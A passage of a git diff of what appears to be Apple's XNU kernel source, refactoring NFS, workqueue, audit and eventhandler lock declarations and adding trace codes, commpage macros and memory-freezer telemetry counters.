                dnp->n_lastdbl = lbn;
                goto done;
@@ -6323,7 +6330,7 @@ nfs_dir_buf_cache_lookup(nfsnode_t dnp, nfsnode_t *npp, struct componentname *cn
        }
 
 done:
-       lck_mtx_unlock(nfs_buf_mutex);
+       lck_mtx_unlock(&nfs_buf_mutex);
 
        if (!error && found && !purge) {
                error = nfs_nget(NFSTOMP(dnp), dnp, cnp, fh->fh_data,
@@ -6402,7 +6409,7 @@ nfs3_readdir_rpc(nfsnode_t dnp, struct nfsbuf *bp, vfs_context_t ctx)
        nmrsize = nmp->nm_rsize;
        bigcookies = nmp->nm_state & NFSSTA_BIGCOOKIES;
        fh = zalloc(nfs_fhandle_zone);
-noplus:
+resend:
        rdirplus = ((nfsvers > NFS_VER2) && NMFLAG(nmp, RDIRPLUS)) ? 1 : 0;
 
        if ((lockerror = nfs_node_lock(dnp))) {
@@ -6483,7 +6490,9 @@ noplus:
                        lck_mtx_lock(&nmp->nm_lock);
                        NFS_BITMAP_CLR(nmp->nm_flags, NFS_MFLAG_RDIRPLUS);
                        lck_mtx_unlock(&nmp->nm_lock);
-                       goto noplus;
+                       nfsm_chain_cleanup(&nmreq);
+                       nfsm_chain_cleanup(&nmrep);
+                       goto resend;
                }
                nfsmout_if(error);
 
@@ -7758,7 +7767,9 @@ nfs_vnop_ioctl(
                if (!auth_is_kerberized(mp->nm_auth)) {
                        return ENOTSUP;
                }
-               error = nfs_gss_clnt_ctx_remove(mp, vfs_context_ucred(ctx));
+               if ((error = nfs_gss_clnt_ctx_remove(mp, vfs_context_ucred(ctx))) == ENOENT) {
+                       error = 0;
+               }
                break;
        case NFS_IOC_SET_CRED:
        case NFS_IOC_SET_CRED64:
@@ -8298,11 +8309,11 @@ nfs_vnop_pageout(
                        xsize = f_offset + size - off;
                }
                lbn = (daddr64_t)(off / biosize);
-               lck_mtx_lock(nfs_buf_mutex);
+               lck_mtx_lock(&nfs_buf_mutex);
                if ((bp = nfs_buf_incore(np, lbn))) {
                        FSDBG(323, off, bp, bp->nb_lflags, bp->nb_flags);
                        if (nfs_buf_acquire(bp, NBAC_NOWAIT, 0, 0)) {
-                               lck_mtx_unlock(nfs_buf_mutex);
+                               lck_mtx_unlock(&nfs_buf_mutex);
                                nfs_data_unlock_noupdate(np);
                                /* no panic. just tell vm we are busy */
                                if (!nofreeupl) {
@@ -8352,7 +8363,7 @@ nfs_vnop_pageout(
                                        nfsbufdelwricnt++;
                                        nfs_buf_drop(bp);
                                        nfs_buf_delwri_push(1);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        nfs_data_unlock_noupdate(np);
                                        if (!nofreeupl) {
                                                ubc_upl_abort_range(pl, pl_offset, size, 0);
@@ -8371,12 +8382,12 @@ nfs_vnop_pageout(
                                        FSDBG(323, bp, bp->nb_dirtyoff, bp->nb_dirtyend, 0xd00dee00);
                                        /* we're leaving this block dirty */
                                        nfs_buf_drop(bp);
-                                       lck_mtx_unlock(nfs_buf_mutex);
+                                       lck_mtx_unlock(&nfs_buf_mutex);
                                        continue;
                                }
                        }
                        nfs_buf_remfree(bp);
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                        SET(bp->nb_flags, NB_INVAL);
                        nfs_node_lock_force(np);
                        if (ISSET(bp->nb_flags, NB_NEEDCOMMIT)) {
@@ -8387,7 +8398,7 @@ nfs_vnop_pageout(
                        nfs_node_unlock(np);
                        nfs_buf_release(bp, 1);
                } else {
-                       lck_mtx_unlock(nfs_buf_mutex);
+                       lck_mtx_unlock(&nfs_buf_mutex);
                }
        }
 
index e34b4fbc0c73e9bb8c74ebdee116883b5a830fc0..4fb5cd6800b10d2c5ac1e9ea5a514713027d9826 100644 (file)
@@ -314,6 +314,7 @@ struct nfsmount {
                        uint64_t mounttime; /* used as client ID verifier */
                        uint64_t clientid; /* client ID, short form */
                        thread_call_t renew_timer; /* RENEW timer call */
+                       lck_mtx_t timer_lock; /* RENEW timer lock */
                        nfs_fsid fsid;  /* NFS file system id */
                        TAILQ_HEAD(, nfsnode) delegations; /* list of nodes with delegations */
                        TAILQ_HEAD(, nfsnode) dreturnq; /* list of nodes with delegations to return */
@@ -419,6 +420,7 @@ struct nfsmount {
 #define nm_mounttime    nm_un.v4.mounttime
 #define nm_fsid         nm_un.v4.fsid
 #define nm_renew_timer  nm_un.v4.renew_timer
+#define nm_timer_lock   nm_un.v4.timer_lock
 #define nm_cbid         nm_un.v4.cbid
 #define nm_cblink       nm_un.v4.cblink
 #define nm_cbrefs       nm_un.v4.cbrefs
index 7f7f802935c251434b3ad387206332d46ffc7994..43a2f5d65ad0e741deb80a473ea562c746fe841f 100644 (file)
@@ -215,7 +215,7 @@ struct nfsbuf {
 LIST_HEAD(nfsbuflists, nfsbuf);
 TAILQ_HEAD(nfsbuffreehead, nfsbuf);
 
-extern lck_mtx_t *nfs_buf_mutex;
+extern lck_mtx_t nfs_buf_mutex;
 extern int nfsbufcnt, nfsbufmin, nfsbufmax, nfsbufmetacnt, nfsbufmetamax;
 extern int nfsbuffreecnt, nfsbuffreemetacnt, nfsbufdelwricnt, nfsneedbuffer;
 extern int nfs_nbdwrite;
@@ -431,7 +431,7 @@ struct nfs_vattr {
        } while (0)
 
 
-extern lck_grp_t *nfs_open_grp;
+extern lck_grp_t nfs_open_grp;
 extern uint32_t nfs_open_owner_seqnum, nfs_lock_owner_seqnum;
 
 /*
@@ -799,7 +799,7 @@ struct nfsnode {
 #define NFSTOV(np)      ((np)->n_vnode)
 
 /* nfsnode hash table mutex */
-extern lck_mtx_t *nfs_node_hash_mutex;
+extern lck_mtx_t nfs_node_hash_mutex;
 
 /*
  * printf-like helper macro that also outputs node name.
@@ -822,7 +822,7 @@ TAILQ_HEAD(nfsiodlist, nfsiod);
 TAILQ_HEAD(nfsiodmountlist, nfsmount);
 extern struct nfsiodlist nfsiodfree, nfsiodwork;
 extern struct nfsiodmountlist nfsiodmounts;
-extern lck_mtx_t *nfsiod_mutex;
+extern lck_mtx_t nfsiod_mutex;
 
 #if defined(KERNEL)
 
index 9c92b00c18281c84a8caa1626be67ccff6e3a196..d6db9b7e9d7ed82371ce3d65addc7cdbaf74c39e 100644 (file)
@@ -125,8 +125,5 @@ struct nfsrvcache {
 #define RC_INETADDR     0x20
 #define RC_NAM          0x40
 
-extern lck_grp_t *nfsrv_reqcache_lck_grp;
-extern lck_mtx_t *nfsrv_reqcache_mutex;
-
 #endif /* __APPLE_API_PRIVATE */
 #endif /* _NFS_NFSRVCACHE_H_ */
index 86e618e7dbc75b085ffd882ba535e4b657e67961..5cddcd16671ecdad8424cc75e2d7b6267b9d0e4a 100644 (file)
@@ -512,6 +512,7 @@ static const struct pthread_callbacks_s pthread_callbacks = {
        .ipc_port_copyout_send = ipc_port_copyout_send,
        .task_get_ipcspace = get_task_ipcspace,
        .vm_map_page_info = vm_map_page_info,
+       .ipc_port_copyout_send_pinned = ipc_port_copyout_send_pinned,
        .thread_set_wq_state32 = thread_set_wq_state32,
 #if !defined(__arm__)
        .thread_set_wq_state64 = thread_set_wq_state64,
@@ -535,11 +536,16 @@ static const struct pthread_callbacks_s pthread_callbacks = {
        .semaphore_signal_internal_trap = semaphore_signal_internal_trap,
        .current_map = _current_map,
        .thread_create = thread_create,
+       /* should be removed once rdar://70892168 lands */
+       .thread_create_pinned = thread_create_pinned,
+       .thread_create_immovable = thread_create_immovable,
+       .thread_terminate_pinned = thread_terminate_pinned,
        .thread_resume = thread_resume,
 
        .kevent_workq_internal = kevent_workq_internal,
 
        .convert_thread_to_port = convert_thread_to_port,
+       .convert_thread_to_port_pinned = convert_thread_to_port_pinned,
 
        .proc_get_stack_addr_hint = proc_get_stack_addr_hint,
        .proc_set_stack_addr_hint = proc_set_stack_addr_hint,
index bc4bd48126fca15b21d803773e100590dee0cd54..e6d06d3f57dacfa793b0c83a39ff01a343d040d8 100644 (file)
@@ -1540,8 +1540,12 @@ workq_open(struct proc *p, __unused struct workq_open_args *uap,
                priority_queue_init(&wq->wq_constrained_queue);
                priority_queue_init(&wq->wq_special_queue);
 
-               wq->wq_delayed_call = thread_call_allocate_with_options(
-                       workq_add_new_threads_call, p, THREAD_CALL_PRIORITY_KERNEL,
+               /* We are only using the delayed thread call for the constrained pool
+                * which can't have work at >= UI QoS and so we can be fine with a
+                * UI QoS thread call.
+                */
+               wq->wq_delayed_call = thread_call_allocate_with_qos(
+                       workq_add_new_threads_call, p, THREAD_QOS_USER_INTERACTIVE,
                        THREAD_CALL_OPTIONS_ONCE);
                wq->wq_immediate_call = thread_call_allocate_with_options(
                        workq_add_new_threads_call, p, THREAD_CALL_PRIORITY_KERNEL,
@@ -2835,11 +2839,14 @@ workq_constrained_allowance(struct workqueue *wq, thread_qos_t at_qos,
 
        /*
         * Compute a metric for many how many threads are active.  We find the
-        * highest priority request outstanding and then add up the number of
-        * active threads in that and all higher-priority buckets.  We'll also add
-        * any "busy" threads which are not active but blocked recently enough that
-        * we can't be sure they've gone idle yet.  We'll then compare this metric
-        * to our max concurrency to decide whether to add a new thread.
+        * highest priority request outstanding and then add up the number of active
+        * threads in that and all higher-priority buckets.  We'll also add any
+        * "busy" threads which are not currently active but blocked recently enough
+        * that we can't be sure that they won't be unblocked soon and start
+        * being active again.
+        *
+        * We'll then compare this metric to our max concurrency to decide whether
+        * to add a new thread.
         */
 
        uint32_t busycount, thactive_count;
@@ -2869,7 +2876,7 @@ workq_constrained_allowance(struct workqueue *wq, thread_qos_t at_qos,
                    thactive_count, busycount, 0);
        }
 
-       if (busycount && may_start_timer) {
+       if (may_start_timer) {
                /*
                 * If this is called from the add timer, we won't have another timer
                 * fire when the thread exits the "busy" state, so rearm the timer.
@@ -3270,8 +3277,6 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq,
 
        workq_thread_reset_pri(wq, uth, req, /*unpark*/ true);
 
-       thread_unfreeze_base_pri(uth->uu_thread);
-#if 0 // <rdar://problem/55259863> to turn this back on
        if (__improbable(thread_unfreeze_base_pri(uth->uu_thread) && !is_creator)) {
                if (req_ts) {
                        workq_perform_turnstile_operation_locked(wq, ^{
@@ -3284,7 +3289,6 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq,
                WQ_TRACE_WQ(TRACE_wq_select_threadreq | DBG_FUNC_NONE, wq, 3, 0, 0, 0);
                goto park_thawed;
        }
-#endif
 
        /*
         * We passed all checks, dequeue the request, bind to it, and set it up
@@ -3355,9 +3359,7 @@ workq_select_threadreq_or_park_and_unlock(proc_t p, struct workqueue *wq,
 
 park:
        thread_unfreeze_base_pri(uth->uu_thread);
-#if 0 // <rdar://problem/55259863>
 park_thawed:
-#endif
        workq_park_and_unlock(p, wq, uth, setup_flags);
 }
 
@@ -3540,10 +3542,12 @@ workq_setup_and_run(proc_t p, struct uthread *uth, int setup_flags)
        }
 
        if (uth->uu_workq_thport == MACH_PORT_NULL) {
-               /* convert_thread_to_port() consumes a reference */
+               /* convert_thread_to_port_pinned() consumes a reference */
                thread_reference(th);
-               ipc_port_t port = convert_thread_to_port(th);
-               uth->uu_workq_thport = ipc_port_copyout_send(port, get_task_ipcspace(p->task));
+               /* Convert to immovable/pinned thread port, but port is not pinned yet */
+               ipc_port_t port = convert_thread_to_port_pinned(th);
+               /* Atomically, pin and copy out the port */
+               uth->uu_workq_thport = ipc_port_copyout_send_pinned(port, get_task_ipcspace(p->task));
        }
 
        /*
index 472b1537290c50b95cced9bb9ed797d8c98ef1ed..c4ed657924b265af12de940ac64af827eba79207 100644 (file)
@@ -806,7 +806,9 @@ audit_arg_vnpath(struct kaudit_record *ar, struct vnode *vp, u_int64_t flags)
                if (*vnode_mac_labelp != NULL) {
                        mac.m_buflen = MAC_AUDIT_LABEL_LEN;
                        mac.m_string = *vnode_mac_labelp;
-                       mac_vnode_label_externalize_audit(vp, &mac);
+                       if (mac_vnode_label_externalize_audit(vp, &mac)) {
+                               return;
+                       }
                }
        }
 #endif
index 18567474f85a982bb23fcec6908cbb6b855835f8..82f9b256d1035c4caccb14783d56e7f89b407058 100644 (file)
@@ -85,7 +85,10 @@ audit_mac_new(proc_t p, struct kaudit_record *ar)
        }
        mac.m_buflen = MAC_AUDIT_LABEL_LEN;
        mac.m_string = ar->k_ar.ar_cred_mac_labels;
-       mac_cred_label_externalize_audit(p, &mac);
+       if (mac_cred_label_externalize_audit(p, &mac)) {
+               zfree(audit_mac_label_zone, ar->k_ar.ar_cred_mac_labels);
+               return 1;
+       }
 
        /*
         * grab space for the reconds.
index 80290b43c75c339da2b51db512638955b71a4817..f9345c4e60d971e8605f0aa90e9861c2c9d15c58 100644 (file)
@@ -102,7 +102,7 @@ static au_sentry_t audit_default_se = {
 struct auditinfo_addr * const audit_default_aia_p = &audit_default_se.se_auinfo;
 
 /* Copied from <ipc/ipc_object.h> */
-#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
+#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
 kern_return_t ipc_object_copyin(ipc_space_t, mach_port_name_t,
     mach_msg_type_name_t, ipc_port_t *, mach_port_context_t, mach_msg_guard_flags_t *, uint32_t);
 void ipc_port_release_send(ipc_port_t);
@@ -1517,7 +1517,7 @@ audit_session_join(proc_t p, struct audit_session_join_args *uap,
 
 
        if (ipc_object_copyin(get_task_ipcspace(p->task), send,
-           MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND) != KERN_SUCCESS) {
+           MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND) != KERN_SUCCESS) {
                *ret_asid = AU_DEFAUDITSID;
                err = EINVAL;
        } else {
index f46094803d7d5caa5013e09d9b112cd49f72678d..92e5fe42f7506b6566e4173da795dc93e371c2ac 100644 (file)
@@ -1036,6 +1036,22 @@ void bufattr_markioscheduled(bufattr_t bap);
  */
 int bufattr_ioscheduled(bufattr_t bap);
 
+/*!
+ *  @function bufattr_markexpeditedmeta
+ *  @abstract Mark a metadata I/O buffer as expedited (i.e. requires a high I/O tier).
+ *  @param bap Buffer attributes to mark.
+ *  @discussion Marks the buffer so that spec_strategy() will know that it should be expedited
+ */
+void bufattr_markexpeditedmeta(bufattr_t bap);
+
+/*!
+ *  @function bufattr_expeditedmeta
+ *  @abstract Check if a buffer is marked as expedited metadata I/O.
+ *  @param bap Buffer attributes to test.
+ *  @return Nonzero if the buffer is marked expedited metadata I/O, 0 otherwise.
+ */
+int bufattr_expeditedmeta(bufattr_t bap);
+
 #ifdef KERNEL_PRIVATE
 void    buf_setfilter(buf_t, void (*)(buf_t, void *), void *, void(**)(buf_t, void *), void **);
 
index 279f5f8b0f82e365715ee0cf6ee21e65be931b14..beddcdbe4c0e3d9c33c762f7683ce1b3311f22ff 100644 (file)
@@ -167,7 +167,7 @@ extern vm_offset_t buf_kernel_addrperm;
 
 /*
  * These flags are kept in b_lflags...
- * buf_mtxp must be held before examining/updating
+ * buf_mtx must be held before examining/updating
  */
 #define BL_BUSY         0x00000001      /* I/O in progress. */
 #define BL_WANTED       0x00000002      /* Process wants this buffer. */
@@ -273,6 +273,7 @@ extern vm_offset_t buf_kernel_addrperm;
 #define BA_STRATEGY_TRACKED_IO  0x00002000 /* tracked by spec_strategy */
 #define BA_IO_TIER_UPGRADE      0x00004000 /* effective I/O tier is higher than BA_IO_TIER */
 #define BA_IO_SCHEDULED         0x00008000 /* buf is associated with a mount point that is io scheduled */
+#define BA_EXPEDITED_META_IO    0x00010000 /* metadata I/O which needs a high I/O tier */
 
 #define GET_BUFATTR_IO_TIER(bap)        ((bap->ba_flags & BA_IO_TIER_MASK) >> BA_IO_TIER_SHIFT)
 #define SET_BUFATTR_IO_TIER(bap, tier)                                          \
index ccdd509491143bbedaffc1e01f90521abe2b5bba..f0c627f8ecfbcbc1442941af54507e19069e0312 100644 (file)
@@ -41,6 +41,56 @@ typedef volatile struct commpage_timeofday_data {
        uint64_t        Ticks_per_sec;
 } new_commpage_timeofday_data_t;
 
+/*!
+ * @macro COMM_PAGE_SLOT_TYPE
+ *
+ * @brief
+ * Macro that expands to the proper type for a pointer to a commpage slot,
+ * to be used in a local variable declaration.
+ *
+ * @description
+ * Usage is something like:
+ * <code>
+ *     COMM_PAGE_SLOT_TYPE(uint64_t) slot = COMM_PAGE_SLOT(uint64_t, FOO);
+ * </code>
+ *
+ * @param type   The scalar base type for the slot.
+ */
+#if __has_feature(address_sanitizer)
+#define COMM_PAGE_SLOT_TYPE(type_t)     type_t __attribute__((address_space(1))) volatile *
+#else
+#define COMM_PAGE_SLOT_TYPE(type_t)     type_t volatile *
+#endif
+
+/*!
+ * @macro COMM_PAGE_SLOT
+ *
+ * @brief
+ * Macro that expands to the properly typed address for a commpage slot.
+ *
+ * @param type   The scalar base type for the slot.
+ * @param name   The slot name, without its @c _COMM_PAGE_ prefix.
+ */
+#define COMM_PAGE_SLOT(type_t, name)    ((COMM_PAGE_SLOT_TYPE(type_t))_COMM_PAGE_##name)
+
+/*!
+ * @macro COMM_PAGE_READ
+ *
+ * @brief
+ * Performs a single read from the commpage in a way that doesn't trip
+ * address sanitizers.
+ *
+ * @description
+ * Typical use looks like this:
+ * <code>
+ *     uint64_t foo_value = COMM_PAGE_READ(uint64_t, FOO);
+ * </code>
+ *
+ * @param type   The scalar base type for the slot.
+ * @param name   The slot name, without its @c _COMM_PAGE_ prefix.
+ */
+#define COMM_PAGE_READ(type_t, slot)    (*(COMM_PAGE_SLOT(type_t, slot)))
+
 #endif
 
 #endif
index 0fb01991feac977e87597829f44cf053f04a15d6..24a1c08fc55803bd83003ae2e2399d27d2bad7f2 100644 (file)
@@ -206,14 +206,6 @@ extern uint64_t cdevsw_flags[];
 #define CDEVSW_IS_PTS        0x08
 
 struct thread;
-
-typedef struct devsw_lock {
-       TAILQ_ENTRY(devsw_lock)         dl_list;
-       struct thread                   *dl_thread;
-       dev_t                           dl_dev;
-       int                             dl_mode;
-} *devsw_lock_t;
-
 #endif /* BSD_KERNEL_PRIVATE */
 
 
@@ -295,7 +287,6 @@ extern struct swdevt swdevt[];
  */
 __BEGIN_DECLS
 #ifdef KERNEL_PRIVATE
-void devsw_init(void);
 extern struct cdevsw cdevsw[];
 extern int cdevsw_setkqueueok(int, const struct cdevsw*, int);
 #endif /* KERNEL_PRIVATE */
index bb70011d22ea1c0249a2096c625a931ebccac064..e1ab6a060d7406ca7d5b6cfe907644c83e2d933c 100644 (file)
@@ -50,6 +50,8 @@ extern "C" {
 /*
  * DTrace Implementation Locks
  */
+extern lck_attr_t dtrace_lck_attr;
+extern lck_grp_t dtrace_lck_grp;
 extern lck_mtx_t dtrace_procwaitfor_lock;
 
 /*
@@ -1395,7 +1397,6 @@ extern void dtrace_probe_error(dtrace_state_t *, dtrace_epid_t, int, int,
 extern int dtrace_assfail(const char *, const char *, int);
 extern int dtrace_attached(void);
 extern hrtime_t dtrace_gethrestime(void);
-extern void dtrace_isa_init(void);
 
 extern void dtrace_flush_caches(void);
 
index cd76a05280eee32b1f3093b957297d7ff58de81c..21552dd6b50591a6b7aab1736433afd62a1fb8f6 100644 (file)
@@ -676,10 +676,6 @@ SLIST_HEAD(klist, knote);
 #include <kern/debug.h> /* panic */
 #include <pthread/priority_private.h>
 
-#ifdef MALLOC_DECLARE
-MALLOC_DECLARE(M_KQUEUE);
-#endif
-
 LIST_HEAD(knote_list, knote);
 TAILQ_HEAD(kqtailq, knote);     /* a list of "queued" events */
 
index 307546942e9ce96646bc575e68562b9afc12f778..0f8ae79fc2af369b70e8cb13ebba7364103812e3 100644 (file)
@@ -65,8 +65,8 @@
 #include <uuid/uuid.h>
 
 extern int evh_debug;
-extern lck_grp_t        *el_lock_grp;
-extern lck_attr_t       *el_lock_attr;
+extern lck_grp_t        el_lock_grp;
+extern lck_attr_t       el_lock_attr;
 extern struct eventhandler_entry_arg eventhandler_entry_dummy_arg;
 
 struct eventhandler_lists_ctxt {
@@ -101,13 +101,13 @@ struct eventhandler_list {
 
 typedef struct eventhandler_entry       *eventhandler_tag;
 
-#define EHL_LOCK_INIT(p)        lck_mtx_init(&(p)->el_lock, el_lock_grp, el_lock_attr)
+#define EHL_LOCK_INIT(p)        lck_mtx_init(&(p)->el_lock, &el_lock_grp, &el_lock_attr)
 #define EHL_LOCK(p)             lck_mtx_lock(&(p)->el_lock)
 #define EHL_LOCK_SPIN(p)        lck_mtx_lock_spin(&(p)->el_lock)
 #define EHL_LOCK_CONVERT(p)     lck_mtx_convert_spin(&(p)->el_lock)
 #define EHL_UNLOCK(p)           lck_mtx_unlock(&(p)->el_lock)
 #define EHL_LOCK_ASSERT(p, x)   LCK_MTX_ASSERT(&(p)->el_lock, x)
-#define EHL_LOCK_DESTROY(p)     lck_mtx_destroy(&(p)->el_lock, el_lock_grp)
+#define EHL_LOCK_DESTROY(p)     lck_mtx_destroy(&(p)->el_lock, &el_lock_grp)
 
 #define evhlog(x)       do { if (evh_debug >= 1) log x; } while (0)
 
index 07299c21d26632b47f5e4e03a9e5e72cbcb161c3..3c961ab23c5aa6e4ccbee53e7495c7931796a9ab 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2010 Apple Inc. All rights reserved.
+ * Copyright (c) 2006-2020 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -42,7 +42,8 @@ bool    imageboot_desired(void);
 void    imageboot_setup(imageboot_type_t type);
 int     imageboot_format_is_valid(const char *root_path);
 int     imageboot_mount_image(const char *root_path, int height, imageboot_type_t type);
-int     imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path, const char *outgoing_root_path, const bool rooted_dmg);
+int     imageboot_pivot_image(const char *image_path, imageboot_type_t type, const char *mount_path,
+    const char *outgoing_root_path, const bool rooted_dmg, const bool skip_signature_check);
 int     imageboot_read_file(struct kalloc_heap *kheap, const char *path, void **bufp, size_t *bufszp);
 int     imageboot_read_file_from_offset(struct kalloc_heap *kheap, const char *path, off_t offset, void **bufp, size_t *bufszp);
 
index 1320d65be615406028bc24d7515de1ca93d34732..e11b773cbef91fa24ae4093deda0861394367392 100644 (file)
@@ -40,7 +40,6 @@ extern int
 kern_asl_msg(int level, const char *facility, size_t num_pairs, ...);
 
 extern int escape_str(char *str, size_t len, size_t buflen);
-extern void fpxlog_init(void);
 extern void fpxlog(int, uint32_t, uint32_t, uint32_t);
 
 #endif /* !_SYS_KASL_H_ */
index 66cb12e92cc0026cd552c193e2c763f4b78e9d9d..3c6cd105cc77a2013df607236eaebdcb61729eb2 100644 (file)
@@ -782,15 +782,19 @@ void kprintf(const char *fmt, ...);
 /*
  * Initialisation.
  */
-extern lck_grp_t *kauth_lck_grp;
 #ifdef XNU_KERNEL_PRIVATE
 __BEGIN_DECLS
+
+extern lck_grp_t kauth_lck_grp;
+
 extern void     kauth_init(void);
 extern void     kauth_cred_init(void);
+/*
+ * If you need accounting for KM_KAUTH consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_KAUTH     KHEAP_DEFAULT
 #if CONFIG_EXT_RESOLVER
-extern void     kauth_identity_init(void);
-extern void     kauth_groups_init(void);
-extern void     kauth_resolver_init(void);
 extern void     kauth_resolver_identity_reset(void);
 #endif
 __END_DECLS
index f458713539e84bee2cb9a49367f2aadef26e6fde..3fbe03b94c98a706b57ce9e5ad56f388112b58b5 100644 (file)
@@ -182,6 +182,7 @@ __BEGIN_DECLS
 #define DBG_MACH_SCHED_CLUTCH   0xA9 /* Clutch scheduler */
 #define DBG_MACH_IO             0xAA /* I/O */
 #define DBG_MACH_WORKGROUP      0xAB /* Workgroup subsystem */
+#define DBG_MACH_HV             0xAC /* Hypervisor subsystem */
 
 /* Codes for DBG_MACH_IO */
 #define DBC_MACH_IO_MMIO_READ           0x1
@@ -260,6 +261,8 @@ __BEGIN_DECLS
 #define MACH_TURNSTILE_KERNEL_CHANGE 0x40 /* sched priority change because of turnstile */
 #define MACH_SCHED_WI_AUTO_JOIN      0x41 /* work interval auto join events */
 #define MACH_SCHED_WI_DEFERRED_FINISH 0x42 /* work interval pending finish events for auto-join thread groups */
+#define MACH_SET_RT_DEADLINE       0x43 /* set thread->realtime.deadline */
+#define MACH_CANCEL_RT_DEADLINE    0x44 /* cancel thread->realtime.deadline */
 #define MACH_PSET_AVG_EXEC_TIME    0x50
 
 /* Codes for Clutch/Edge Scheduler (DBG_MACH_SCHED_CLUTCH) */
@@ -360,6 +363,13 @@ __BEGIN_DECLS
 #define PMAP__UPDATE_CACHING    0x15
 #define PMAP__ATTRIBUTE_CLEAR_RANGE 0x16
 #define PMAP__CLEAR_USER_TTB    0x17
+#define PMAP__IOMMU_INIT        0x18
+#define PMAP__IOMMU_IOVMALLOC   0x19
+#define PMAP__IOMMU_IOVMFREE    0x1a
+#define PMAP__IOMMU_MAP         0x1b
+#define PMAP__IOMMU_UNMAP       0x1c
+#define PMAP__IOMMU_IOCTL       0x1d
+#define PMAP__IOMMU_GRANT_PAGE  0x1e
 
 /* Codes for clock (DBG_MACH_CLOCK) */
 #define MACH_EPOCH_CHANGE       0x0     /* wake epoch change */
@@ -420,6 +430,10 @@ __BEGIN_DECLS
 #define RMON_LOGWRITES_VIOLATED_K32B    0x025
 #define RMON_DISABLE_IO_MONITOR         0x02f
 
+/* Codes for Hypervisor (DBG_MACH_HV) */
+#define HV_GUEST_ENTER                  0x000
+#define HV_GUEST_ERROR                  0x001
+
 /* **** The Kernel Debug Sub Classes for Network (DBG_NETWORK) **** */
 #define DBG_NETIP       1       /* Internet Protocol */
 #define DBG_NETARP      2       /* Address Resolution Protocol */
@@ -570,6 +584,11 @@ __BEGIN_DECLS
 #define DBG_HFS_UPDATE_MINOR     0x40
 #define DBG_HFS_UPDATE_SKIPPED   0x80
 
+/*
+ * Codes for Kernel Debug Sub Class DBG_VFS
+ */
+#define DBG_VFS_IO_COMPRESSION_STATS 0x1000
+
 /* The Kernel Debug Sub Classes for BSD */
 #define DBG_BSD_PROC              0x01 /* process/signals related */
 #define DBG_BSD_MEMSTAT           0x02 /* memorystatus / jetsam operations */
index 4cbfd6b8f0c4ccae1e95c7428e868a146df620e6..8db45d65e0a24a57d06da0113b2bce73b5cc830d 100644 (file)
@@ -364,7 +364,7 @@ int memorystatus_control(uint32_t command, int32_t pid, uint32_t flags, void *bu
 #define MEMORYSTATUS_CMD_INCREASE_JETSAM_TASK_LIMIT   22   /* Used by DYLD to increase the jetsam active and inactive limits, when using roots */
 
 #if PRIVATE
-#define MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP 23 /* Used by unit tests in the development kernel only. */
+#define MEMORYSTATUS_CMD_SET_TESTING_PID 23 /* Used by unit tests in the development kernel only. */
 #endif /* PRIVATE */
 
 #define MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZEN 24 /* Check if the process is frozen. */
@@ -402,8 +402,8 @@ typedef struct memorystatus_jetsam_panic_options {
 #define MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY          0x10    /* Set probability of use for a group of processes */
 
 #if PRIVATE
-#define MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP      0x20 /* Only used by xnu unit tests. */
-#define MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP      0x40 /* Only used by xnu unit tests. */
+#define MEMORYSTATUS_FLAGS_SET_TESTING_PID     0x20 /* Only used by xnu unit tests. */
+#define MEMORYSTATUS_FLAGS_UNSET_TESTING_PID   0x40 /* Only used by xnu unit tests. */
 #endif /* PRIVATE */
 
 #define MEMORYSTATUS_FLAGS_SNAPSHOT_FREEZER             0x80    /* A snapshot buffer containing app kills since last consumption */
index dd01e09ce8f2efd2e6049fc3477bcd645b024cf1..c962d09490cbc3ac95d7616703cb453638840312 100644 (file)
@@ -58,6 +58,7 @@ extern unsigned int memorystatus_freeze_private_shared_pages_ratio; /* Ratio of
 extern unsigned int memorystatus_suspended_count;
 extern unsigned int memorystatus_thaw_count; /* # of processes that have been thawed in the current interval. */
 extern unsigned int memorystatus_refreeze_eligible_count; /* # of processes currently thawed i.e. have state on disk & in-memory */
+extern uint32_t memorystatus_freeze_current_interval; /* Monotonically increasing interval id. */
 
 void memorystatus_freeze_init(void);
 extern int  memorystatus_freeze_process_sync(proc_t p);
@@ -115,6 +116,67 @@ int memorystatus_freezer_control(int32_t flags, user_addr_t buffer, size_t buffe
 void memorystatus_freeze_init_proc(proc_t p);
 errno_t memorystatus_get_process_is_frozen(pid_t pid, int *is_freezable);
 
+/* Freezer counters collected for telemtry */
+struct memorystatus_freezer_stats_t {
+       /*
+        * # of processes that we've considered freezing.
+        * Used to normalize the error reasons below.
+        */
+       uint64_t mfs_process_considered_count;
+
+       /*
+        * The following counters track how many times we've failed to freeze
+        * a process because of a specific FREEZER_ERROR.
+        */
+       /* EXCESS_SHARED_MEMORY */
+       uint64_t mfs_error_excess_shared_memory_count;
+       /* LOW_PRIVATE_SHARED_RATIO */
+       uint64_t mfs_error_low_private_shared_ratio_count;
+       /* NO_COMPRESSOR_SPACE */
+       uint64_t mfs_error_no_compressor_space_count;
+       /* NO_SWAP_SPACE */
+       uint64_t mfs_error_no_swap_space_count;
+       /* pages < memorystatus_freeze_pages_min */
+       uint64_t mfs_error_below_min_pages_count;
+       /* dasd determined it was unlikely to be relaunched. */
+       uint64_t mfs_error_low_probability_of_use_count;
+       /* transient reasons (like inability to acquire a lock). */
+       uint64_t mfs_error_other_count;
+
+       /*
